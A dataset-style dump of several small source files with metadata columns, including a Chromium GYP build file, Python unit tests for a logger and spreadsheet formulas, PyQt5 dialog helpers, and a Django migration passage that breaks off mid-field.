| 70
| 59.4
| 0.913669
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
d40c46d4ac1e751dbbe37d1278e9b0871ae0d933
| 2,743
|
gyp
|
Python
|
chrome/browser/resources/md_user_manager/compiled_resources2.gyp
|
google-ar/chromium
|
2441c86a5fd975f09a6c30cddb57dfb7fc239699
|
[
"Apache-2.0",
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 777
|
2017-08-29T15:15:32.000Z
|
2022-03-21T05:29:41.000Z
|
chrome/browser/resources/md_user_manager/compiled_resources2.gyp
|
harrymarkovskiy/WebARonARCore
|
2441c86a5fd975f09a6c30cddb57dfb7fc239699
|
[
"Apache-2.0",
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 66
|
2017-08-30T18:31:18.000Z
|
2021-08-02T10:59:35.000Z
|
chrome/browser/resources/md_user_manager/compiled_resources2.gyp
|
harrymarkovskiy/WebARonARCore
|
2441c86a5fd975f09a6c30cddb57dfb7fc239699
|
[
"Apache-2.0",
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 123
|
2017-08-30T01:19:34.000Z
|
2022-03-17T22:55:31.000Z
|
# Copyright 2016 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
{
'targets': [
{
'target_name': 'control_bar',
'dependencies': [
'<(DEPTH)/ui/webui/resources/js/compiled_resources2.gyp:cr',
'<(DEPTH)/ui/webui/resources/js/compiled_resources2.gyp:i18n_behavior',
'profile_browser_proxy',
],
'includes': ['../../../../third_party/closure_compiler/compile_js2.gypi'],
},
{
'target_name': 'create_profile',
'dependencies': [
'<(DEPTH)/ui/webui/resources/js/compiled_resources2.gyp:i18n_behavior',
'<(DEPTH)/ui/webui/resources/js/compiled_resources2.gyp:util',
'<(DEPTH)/ui/webui/resources/js/compiled_resources2.gyp:web_ui_listener_behavior',
'profile_browser_proxy',
],
'includes': ['../../../../third_party/closure_compiler/compile_js2.gypi'],
},
{
'target_name': 'error_dialog',
'includes': ['../../../../third_party/closure_compiler/compile_js2.gypi'],
},
{
'target_name': 'import_supervised_user',
'dependencies': [
'<(DEPTH)/ui/webui/resources/js/compiled_resources2.gyp:i18n_behavior',
'profile_browser_proxy',
],
'includes': ['../../../../third_party/closure_compiler/compile_js2.gypi'],
},
{
'target_name': 'profile_browser_proxy',
'dependencies': [
'<(DEPTH)/ui/webui/resources/js/compiled_resources2.gyp:assert',
'<(DEPTH)/ui/webui/resources/js/compiled_resources2.gyp:cr',
],
'includes': ['../../../../third_party/closure_compiler/compile_js2.gypi'],
},
{
'target_name': 'supervised_user_create_confirm',
'dependencies': [
'<(DEPTH)/ui/webui/resources/js/compiled_resources2.gyp:i18n_behavior',
'<(DEPTH)/ui/webui/resources/js/compiled_resources2.gyp:util',
'profile_browser_proxy',
],
'includes': ['../../../../third_party/closure_compiler/compile_js2.gypi'],
},
{
'target_name': 'supervised_user_learn_more',
'dependencies': [
'profile_browser_proxy',
],
'includes': ['../../../../third_party/closure_compiler/compile_js2.gypi'],
},
{
'target_name': 'user_manager_pages',
'includes': ['../../../../third_party/closure_compiler/compile_js2.gypi'],
},
{
'target_name': 'user_manager_tutorial',
'dependencies': [
'<(DEPTH)/ui/webui/resources/js/compiled_resources2.gyp:i18n_behavior',
'<(DEPTH)/ui/webui/resources/js/compiled_resources2.gyp:util',
],
'includes': ['../../../../third_party/closure_compiler/compile_js2.gypi'],
},
],
}
| 36.573333
| 90
| 0.618301
| 283
| 2,743
| 5.699647
| 0.24735
| 0.052077
| 0.089275
| 0.156231
| 0.82579
| 0.82579
| 0.82579
| 0.82579
| 0.769374
| 0.67018
| 0
| 0.015823
| 0.193584
| 2,743
| 74
| 91
| 37.067568
| 0.713382
| 0.056507
| 0
| 0.549296
| 0
| 0
| 0.706656
| 0.583978
| 0
| 0
| 0
| 0
| 0.014085
| 1
| 0
| true
| 0
| 0.014085
| 0
| 0.014085
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
2e04f00e3890a8b78c64d89a3850c214b6625aee
| 4,795
|
py
|
Python
|
python/sdk/test/logger_test.py
|
karzuo/merlin
|
bdbdac35071d81beb1b8b5b807697bf2eac69a40
|
[
"Apache-2.0"
] | 1
|
2021-12-26T09:04:12.000Z
|
2021-12-26T09:04:12.000Z
|
python/sdk/test/logger_test.py
|
ibnummuhammad/merlin
|
acf10a350bcacfdfe67f7020d535467b71ff1d89
|
[
"Apache-2.0"
] | null | null | null |
python/sdk/test/logger_test.py
|
ibnummuhammad/merlin
|
acf10a350bcacfdfe67f7020d535467b71ff1d89
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2020 The Merlin Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import pytest
import client
from merlin.logger import Logger,LoggerMode,LoggerConfig
@pytest.mark.unit
def test_from_logger_response():
logger_response = client.Logger(model=client.LoggerConfig(enabled=True, mode=client.LoggerMode.RESPONSE))
result = Logger.from_logger_response(logger_response)
expected_result = Logger(model=LoggerConfig(enabled=True, mode=LoggerMode.RESPONSE))
assert result.model is not None
assert result.model.enabled == expected_result.model.enabled
assert result.model.mode == expected_result.model.mode
assert result.transformer is None
logger_response = client.Logger(model=client.LoggerConfig(enabled=False, mode=""))
result = Logger.from_logger_response(logger_response)
expected_result = Logger(model=LoggerConfig(enabled=False, mode=LoggerMode.ALL))
assert result.model is not None
assert result.model.enabled == expected_result.model.enabled
assert result.model.mode == expected_result.model.mode
assert result.transformer is None
logger_response = client.Logger(transformer=client.LoggerConfig(enabled=True, mode=client.LoggerMode.REQUEST))
result = Logger.from_logger_response(logger_response)
expected_result = Logger(transformer=LoggerConfig(enabled=True, mode=LoggerMode.REQUEST))
assert result.transformer is not None
assert result.transformer.enabled == expected_result.transformer.enabled
assert result.transformer.mode == expected_result.transformer.mode
assert result.model is None
logger_response = client.Logger(model=client.LoggerConfig(enabled=True, mode=client.LoggerMode.ALL),
transformer=client.LoggerConfig(enabled=True, mode=client.LoggerMode.ALL))
result = Logger.from_logger_response(logger_response)
expected_result = Logger(model=LoggerConfig(enabled=True, mode=LoggerMode.ALL),
transformer=LoggerConfig(enabled=True, mode=LoggerMode.ALL))
assert result.transformer is not None
assert result.transformer.enabled == expected_result.transformer.enabled
assert result.transformer.mode == expected_result.transformer.mode
assert result.model is not None
assert result.model.enabled == expected_result.model.enabled
assert result.model.mode == expected_result.model.mode
result = Logger.from_logger_response(None)
assert result.model is None
assert result.transformer is None
@pytest.mark.unit
def test_to_logger_spec():
logger = Logger(model=LoggerConfig(enabled=False, mode=LoggerMode.REQUEST))
result = logger.to_logger_spec()
expected_result = client.Logger(model=client.LoggerConfig(enabled=False, mode=client.LoggerMode.REQUEST))
assert result.model is not None
assert result.model.enabled == expected_result.model.enabled
assert result.model.mode == expected_result.model.mode
assert result.transformer is None
logger = Logger(transformer=LoggerConfig(enabled=True, mode=LoggerMode.RESPONSE))
result = logger.to_logger_spec()
expected_result = client.Logger(transformer=client.LoggerConfig(enabled=True, mode=client.LoggerMode.RESPONSE))
assert result.transformer is not None
assert result.transformer.enabled == expected_result.transformer.enabled
assert result.transformer.mode == expected_result.transformer.mode
assert result.model is None
logger = Logger(model=LoggerConfig(enabled=True, mode=LoggerMode.ALL),
transformer=LoggerConfig(enabled=True, mode=LoggerMode.ALL))
result = logger.to_logger_spec()
expected_result = client.Logger(model=client.LoggerConfig(enabled=True, mode=client.LoggerMode.ALL),
transformer=client.LoggerConfig(enabled=True, mode=client.LoggerMode.ALL))
assert result.transformer is not None
assert result.transformer.enabled == expected_result.transformer.enabled
assert result.transformer.mode == expected_result.transformer.mode
assert result.model is not None
assert result.model.enabled == expected_result.model.enabled
assert result.model.mode == expected_result.model.mode
logger = Logger()
result = logger.to_logger_spec()
assert result is None
| 48.928571
| 115
| 0.762044
| 598
| 4,795
| 6.01505
| 0.147157
| 0.116764
| 0.085071
| 0.105088
| 0.830692
| 0.790381
| 0.777592
| 0.730331
| 0.720879
| 0.710314
| 0
| 0.001968
| 0.152033
| 4,795
| 97
| 116
| 49.43299
| 0.882686
| 0.115954
| 0
| 0.685714
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.5
| 1
| 0.028571
| false
| 0
| 0.042857
| 0
| 0.071429
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2e0ef6e3eb7ec754c6ff564a4bfd5f7d8c5ce958
| 262
|
py
|
Python
|
superbench/monitor/__init__.py
|
yangpanMS/superbenchmark
|
4d85630abba0fe45b8cd3a51e79c15e6ac87a1e6
|
[
"MIT"
] | 59
|
2021-04-12T09:44:23.000Z
|
2022-03-27T14:33:46.000Z
|
superbench/monitor/__init__.py
|
yangpanMS/superbenchmark
|
4d85630abba0fe45b8cd3a51e79c15e6ac87a1e6
|
[
"MIT"
] | 275
|
2021-03-29T06:40:34.000Z
|
2022-03-30T07:35:49.000Z
|
superbench/monitor/__init__.py
|
yangpanMS/superbenchmark
|
4d85630abba0fe45b8cd3a51e79c15e6ac87a1e6
|
[
"MIT"
] | 24
|
2021-04-09T12:42:27.000Z
|
2022-03-16T08:26:34.000Z
|
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT License.
"""Exposes interfaces of SuperBench Monitor."""
from superbench.monitor.monitor import Monitor
from superbench.monitor.record import MonitorRecord
__all__ = ['Monitor', 'MonitorRecord']
| 26.2
| 51
| 0.78626
| 29
| 262
| 6.965517
| 0.655172
| 0.252475
| 0.207921
| 0.277228
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.118321
| 262
| 9
| 52
| 29.111111
| 0.874459
| 0.423664
| 0
| 0
| 0
| 0
| 0.138889
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
2e2ec6aafc2b620a6cf6b689d6b6cf9133b067a9
| 194
|
py
|
Python
|
rasa_core/actions/__init__.py
|
ebarahona/rasa_core
|
f3dbb70d0bb748628ab238eded17a8f5e09279e2
|
[
"Apache-2.0"
] | 46
|
2017-11-16T06:03:48.000Z
|
2022-03-06T18:25:15.000Z
|
rasa_core/actions/__init__.py
|
ebarahona/rasa_core
|
f3dbb70d0bb748628ab238eded17a8f5e09279e2
|
[
"Apache-2.0"
] | null | null | null |
rasa_core/actions/__init__.py
|
ebarahona/rasa_core
|
f3dbb70d0bb748628ab238eded17a8f5e09279e2
|
[
"Apache-2.0"
] | 21
|
2018-02-05T09:59:40.000Z
|
2020-09-24T14:39:16.000Z
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from rasa_core.actions.action import Action
| 27.714286
| 43
| 0.881443
| 26
| 194
| 5.807692
| 0.5
| 0.264901
| 0.423841
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.108247
| 194
| 6
| 44
| 32.333333
| 0.872832
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0.2
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
2e3354d1ca1e9c318c7b6ebdbcac7b4fe2d0809c
| 175
|
py
|
Python
|
WebApp/utils.py
|
CSCIX691DAL/AISExplore
|
2826e4eefb156b890d2f08d0ca60bc8a8ea8f94e
|
[
"MIT"
] | null | null | null |
WebApp/utils.py
|
CSCIX691DAL/AISExplore
|
2826e4eefb156b890d2f08d0ca60bc8a8ea8f94e
|
[
"MIT"
] | 1
|
2021-07-07T02:14:35.000Z
|
2021-07-07T02:14:35.000Z
|
WebApp/utils.py
|
CSCIX691DAL/AISExplore
|
2826e4eefb156b890d2f08d0ca60bc8a8ea8f94e
|
[
"MIT"
] | null | null | null |
from RealTimeAIS.settings import DATABASE_NAME,PORT_NUMBER
from pymongo import MongoClient
def get_database():
return getattr(MongoClient(port=PORT_NUMBER),DATABASE_NAME)
| 35
| 63
| 0.845714
| 23
| 175
| 6.217391
| 0.608696
| 0.167832
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.091429
| 175
| 5
| 63
| 35
| 0.899371
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| true
| 0
| 0.5
| 0.25
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
2e7a2a18a762eb783d383ee79203b7d8c606b374
| 5,986
|
py
|
Python
|
tests/test_information.py
|
uncountableinc/hotxlfp
|
8e5bf9a27140d87caa3423e918d42a2a5e7075b5
|
[
"MIT"
] | 24
|
2019-04-15T17:51:42.000Z
|
2022-01-05T10:22:47.000Z
|
tests/test_information.py
|
aidhound/hotxlfp
|
82f47586d39092bfb7a112619046e842b343f860
|
[
"MIT"
] | 11
|
2019-11-03T13:31:08.000Z
|
2022-02-23T20:09:31.000Z
|
tests/test_information.py
|
uncountableinc/hotxlfp
|
8e5bf9a27140d87caa3423e918d42a2a5e7075b5
|
[
"MIT"
] | 8
|
2019-06-04T08:49:45.000Z
|
2021-08-16T19:39:50.000Z
|
# -*- coding: utf-8 -*-
import unittest
from hotxlfp import Parser
class TestStatistical(unittest.TestCase):
def test_error_type(self):
p = Parser(debug=True)
ret = p.parse('ERROR.TYPE(1/0)')
self.assertEqual(ret['result'], 2)
self.assertEqual(ret['error'], None)
def test_iserr(self):
p = Parser(debug=True)
ret = p.parse('ISERR(1/0)')
self.assertEqual(ret['result'], True)
self.assertEqual(ret['error'], None)
def test_iserror(self):
p = Parser(debug=True)
ret = p.parse('ISERROR(1/0)')
self.assertEqual(ret['result'], True)
self.assertEqual(ret['error'], None)
p = Parser(debug=True)
ret = p.parse('ISERROR(1/2)')
self.assertEqual(ret['result'], False)
self.assertEqual(ret['error'], None)
def test_iseven(self):
p = Parser(debug=True)
ret = p.parse('ISEVEN(1)')
self.assertEqual(ret['result'], False)
self.assertEqual(ret['error'], None)
ret = p.parse('ISEVEN(-1)')
self.assertEqual(ret['result'], False)
self.assertEqual(ret['error'], None)
ret = p.parse('ISEVEN(2)')
self.assertEqual(ret['result'], True)
self.assertEqual(ret['error'], None)
ret = p.parse('ISEVEN(-2)')
self.assertEqual(ret['result'], True)
self.assertEqual(ret['error'], None)
ret = p.parse('ISEVEN(1000)')
self.assertEqual(ret['result'], True)
self.assertEqual(ret['error'], None)
ret = p.parse('ISEVEN("A")')
self.assertEqual(ret['result'], None)
self.assertEqual(ret['error'], '#VALUE!')
ret = p.parse('ISEVEN(2.21)')
self.assertEqual(ret['result'], True)
self.assertEqual(ret['error'], None)
def test_isodd(self):
p = Parser(debug=True)
ret = p.parse('ISODD(1)')
self.assertEqual(ret['result'], True)
self.assertEqual(ret['error'], None)
ret = p.parse('ISODD(-1)')
self.assertEqual(ret['result'], True)
self.assertEqual(ret['error'], None)
ret = p.parse('ISODD(2)')
self.assertEqual(ret['result'], False)
self.assertEqual(ret['error'], None)
ret = p.parse('ISODD(-2)')
self.assertEqual(ret['result'], False)
self.assertEqual(ret['error'], None)
ret = p.parse('ISODD(1000)')
self.assertEqual(ret['result'], False)
self.assertEqual(ret['error'], None)
ret = p.parse('ISODD("A")')
self.assertEqual(ret['result'], None)
self.assertEqual(ret['error'], '#VALUE!')
ret = p.parse('ISODD(2.21)')
self.assertEqual(ret['result'], False)
self.assertEqual(ret['error'], None)
def test_istext(self):
p = Parser(debug=True)
ret = p.parse('ISTEXT("foo")')
self.assertEqual(ret['result'], True)
self.assertEqual(ret['error'], None)
ret = p.parse('ISTEXT(NA())')
self.assertEqual(ret['result'], False)
self.assertEqual(ret['error'], None)
ret = p.parse('ISTEXT(1)')
self.assertEqual(ret['result'], False)
self.assertEqual(ret['error'], None)
def test_isnumber(self):
p = Parser(debug=True)
ret = p.parse('ISNUMBER("foo")')
self.assertEqual(ret['result'], False)
self.assertEqual(ret['error'], None)
ret = p.parse('ISNUMBER(TRUE)')
self.assertEqual(ret['result'], False)
self.assertEqual(ret['error'], None)
ret = p.parse('ISNUMBER(NA())')
self.assertEqual(ret['result'], False)
self.assertEqual(ret['error'], None)
ret = p.parse('ISNUMBER(1)')
self.assertEqual(ret['result'], True)
self.assertEqual(ret['error'], None)
def test_islogical(self):
p = Parser(debug=True)
ret = p.parse('ISLOGICAL("foo")')
self.assertEqual(ret['result'], False)
self.assertEqual(ret['error'], None)
ret = p.parse('ISLOGICAL(TRUE)')
self.assertEqual(ret['result'], True)
self.assertEqual(ret['error'], None)
ret = p.parse('ISLOGICAL(NA())')
self.assertEqual(ret['result'], False)
self.assertEqual(ret['error'], None)
ret = p.parse('ISLOGICAL(1)')
self.assertEqual(ret['result'], False)
self.assertEqual(ret['error'], None)
def test_isna(self):
p = Parser(debug=True)
ret = p.parse('ISNA(NA())')
self.assertEqual(ret['result'], True)
self.assertEqual(ret['error'], None)
ret = p.parse('ISNA(1/0)')
self.assertEqual(ret['result'], False)
self.assertEqual(ret['error'], None)
def test_isnontext(self):
p = Parser(debug=True)
ret = p.parse('ISNONTEXT("foo")')
self.assertEqual(ret['result'], False)
self.assertEqual(ret['error'], None)
ret = p.parse('ISNONTEXT(NA())')
self.assertEqual(ret['result'], True)
self.assertEqual(ret['error'], None)
ret = p.parse('ISNONTEXT(1)')
self.assertEqual(ret['result'], True)
self.assertEqual(ret['error'], None)
def test_n(self):
p = Parser(debug=True)
ret = p.parse('N(1)')
self.assertEqual(ret['result'], 1)
self.assertEqual(ret['error'], None)
ret = p.parse('N(TODAY())')
ret2 = p.parse('DATEVALUE(TODAY())')
self.assertEqual(ret['result'], ret2['result'])
self.assertEqual(ret['error'], None)
ret = p.parse('N("1024")')
self.assertEqual(ret['result'], 0)
self.assertEqual(ret['error'], None)
ret = p.parse('N("foo")')
self.assertEqual(ret['result'], 0)
self.assertEqual(ret['error'], None)
ret = p.parse('N(TRUE())')
self.assertEqual(ret['result'], 1)
self.assertEqual(ret['error'], None)
ret = p.parse('N(FALSE())')
self.assertEqual(ret['result'], 0)
self.assertEqual(ret['error'], None)
| 36.723926
| 55
| 0.566321
| 720
| 5,986
| 4.691667
| 0.066667
| 0.35524
| 0.426288
| 0.284192
| 0.915038
| 0.903789
| 0.893724
| 0.883659
| 0.801954
| 0.760213
| 0
| 0.011086
| 0.246575
| 5,986
| 162
| 56
| 36.950617
| 0.737916
| 0.003508
| 0
| 0.612245
| 0
| 0
| 0.154956
| 0
| 0
| 0
| 0
| 0
| 0.544218
| 1
| 0.07483
| false
| 0
| 0.013605
| 0
| 0.095238
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
d8918f1419b92b7f26ec03ce9b08311924c3e159
| 135
|
py
|
Python
|
object_detection/project_path.py
|
MourabitElBachir/visual-recognition-server-control-back
|
49ec2a459e8c418a395340d2d3f876af400cb75c
|
[
"MIT"
] | null | null | null |
object_detection/project_path.py
|
MourabitElBachir/visual-recognition-server-control-back
|
49ec2a459e8c418a395340d2d3f876af400cb75c
|
[
"MIT"
] | null | null | null |
object_detection/project_path.py
|
MourabitElBachir/visual-recognition-server-control-back
|
49ec2a459e8c418a395340d2d3f876af400cb75c
|
[
"MIT"
] | null | null | null |
import os
def get_correct_path(files):
return os.path.join(os.path.dirname(os.path.dirname(os.path.abspath(__file__))), files)
| 19.285714
| 92
| 0.740741
| 22
| 135
| 4.272727
| 0.545455
| 0.255319
| 0.276596
| 0.319149
| 0.340426
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.111111
| 135
| 6
| 93
| 22.5
| 0.783333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 9
|
2b6b4eeb3b8df5d884dba4fb4dd003f2611a8e71
| 202
|
py
|
Python
|
2018-01/01_Jan/19/_09_doc.py
|
z727354123/pyCharmTest
|
9cbd770e19929cb4feb3be2f13b60dc0b1f68b56
|
[
"Apache-2.0"
] | null | null | null |
2018-01/01_Jan/19/_09_doc.py
|
z727354123/pyCharmTest
|
9cbd770e19929cb4feb3be2f13b60dc0b1f68b56
|
[
"Apache-2.0"
] | null | null | null |
2018-01/01_Jan/19/_09_doc.py
|
z727354123/pyCharmTest
|
9cbd770e19929cb4feb3be2f13b60dc0b1f68b56
|
[
"Apache-2.0"
] | null | null | null |
class Person:
'''
这是一个 Person类
实例属性:
None: 没有任何东西
'''
print('--------')
print(Person.__doc__)
print('--------')
Person.__doc__ = "三扥东方"
print(Person.__doc__)
print('--------')
| 13.466667
| 23
| 0.514851
| 19
| 202
| 4.842105
| 0.526316
| 0.358696
| 0.456522
| 0.413043
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.212871
| 202
| 14
| 24
| 14.428571
| 0.578616
| 0.173267
| 0
| 0.714286
| 0
| 0
| 0.195804
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0.142857
| 0.714286
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
2b77008476af200bdf16f17ef550d540123c445c
| 272
|
py
|
Python
|
uncollapse-digits/golfed.py
|
JoelAtDeluxe/GolfChallenges
|
e86a4d85476bd03f6b32a45e77f1aace56f8d94e
|
[
"MIT"
] | null | null | null |
uncollapse-digits/golfed.py
|
JoelAtDeluxe/GolfChallenges
|
e86a4d85476bd03f6b32a45e77f1aace56f8d94e
|
[
"MIT"
] | null | null | null |
uncollapse-digits/golfed.py
|
JoelAtDeluxe/GolfChallenges
|
e86a4d85476bd03f6b32a45e77f1aace56f8d94e
|
[
"MIT"
] | null | null | null |
def uncollapse(s):
for n in ['zero','one','two','three','four','five','six','seven','eight','nine']:
s=s.replace(n,n+' ')
return s[:-1]
def G(s):
for n in ['zero','one','two','three','four','five','six','seven','eight','nine']:
s=s.replace(n,n+' ')
return s[:-1]
| 27.2
| 82
| 0.547794
| 48
| 272
| 3.104167
| 0.416667
| 0.053691
| 0.067114
| 0.09396
| 0.885906
| 0.885906
| 0.885906
| 0.885906
| 0.885906
| 0.885906
| 0
| 0.00823
| 0.106618
| 272
| 9
| 83
| 30.222222
| 0.604938
| 0
| 0
| 0.75
| 0
| 0
| 0.301471
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| false
| 0
| 0
| 0
| 0.5
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
9966439ff844ca51d15b06f014fb6d5dad1ae8e2
| 893
|
py
|
Python
|
utils/dialogs.py
|
4rzael/krocs
|
42cb0a806d4c5a9350fca84a0258817bf6a9c154
|
[
"MIT"
] | 5
|
2018-05-07T12:57:58.000Z
|
2020-07-08T01:46:39.000Z
|
utils/dialogs.py
|
4rzael/krocs
|
42cb0a806d4c5a9350fca84a0258817bf6a9c154
|
[
"MIT"
] | null | null | null |
utils/dialogs.py
|
4rzael/krocs
|
42cb0a806d4c5a9350fca84a0258817bf6a9c154
|
[
"MIT"
] | null | null | null |
""" PyQt5 imports. """
from PyQt5.QtWidgets import QMessageBox
def show_error(text, info_text, detail_text):
msg = QMessageBox()
msg.setIcon(QMessageBox.Critical)
msg.setText(text)
msg.setWindowTitle("Critical")
if info_text is not None:
msg.setInformativeText(info_text)
if detail_text is not None:
msg.setDetailedText(detail_text)
msg.setStandardButtons(QMessageBox.Ok)
msg.buttonClicked.connect(msg.close)
msg.exec_()
def show_info(text, info_text, detail_text):
msg = QMessageBox()
msg.setIcon(QMessageBox.Information)
msg.setText(text)
msg.setWindowTitle("Information")
if info_text is not None:
msg.setInformativeText(info_text)
if detail_text is not None:
msg.setDetailedText(detail_text)
msg.setStandardButtons(QMessageBox.Ok)
msg.buttonClicked.connect(msg.close)
msg.exec_()
| 27.90625
| 45
| 0.714446
| 109
| 893
| 5.706422
| 0.275229
| 0.090032
| 0.083601
| 0.083601
| 0.826367
| 0.726688
| 0.726688
| 0.726688
| 0.726688
| 0.726688
| 0
| 0.002755
| 0.18701
| 893
| 31
| 46
| 28.806452
| 0.853994
| 0.015677
| 0
| 0.72
| 0
| 0
| 0.021814
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.08
| false
| 0
| 0.04
| 0
| 0.12
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
9979e76414080e8f53b8bc49168e295079064912
| 12,708
|
py
|
Python
|
apis_core/apis_relations/migrations/0002_auto_20200121_1227.py
|
acdh-oeaw/apis-core
|
f7ece05eec46c820321fd28d3e947653dcb98ae7
|
[
"MIT"
] | 11
|
2018-07-11T18:11:40.000Z
|
2022-03-25T11:07:12.000Z
|
apis_core/apis_relations/migrations/0002_auto_20200121_1227.py
|
acdh-oeaw/apis-core
|
f7ece05eec46c820321fd28d3e947653dcb98ae7
|
[
"MIT"
] | 309
|
2018-06-11T08:38:50.000Z
|
2022-03-31T13:45:22.000Z
|
apis_core/apis_relations/migrations/0002_auto_20200121_1227.py
|
acdh-oeaw/apis-core
|
f7ece05eec46c820321fd28d3e947653dcb98ae7
|
[
"MIT"
] | 5
|
2017-08-21T10:37:07.000Z
|
2021-09-27T19:08:47.000Z
|
# Generated by Django 2.1.12 on 2020-01-21 12:27
import django.db.models.deletion
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
('apis_vocabularies', '0001_initial'),
('apis_relations', '0001_initial'),
('apis_entities', '0002_auto_20200121_1227'),
]
operations = [
migrations.AddField(
model_name='workwork',
name='relation_type',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='workwork_set', to='apis_vocabularies.WorkWorkRelation'),
),
migrations.AddField(
model_name='placework',
name='related_place',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='placework_set', to='apis_entities.Place'),
),
migrations.AddField(
model_name='placework',
name='related_work',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='placework_set', to='apis_entities.Work'),
),
migrations.AddField(
model_name='placework',
name='relation_type',
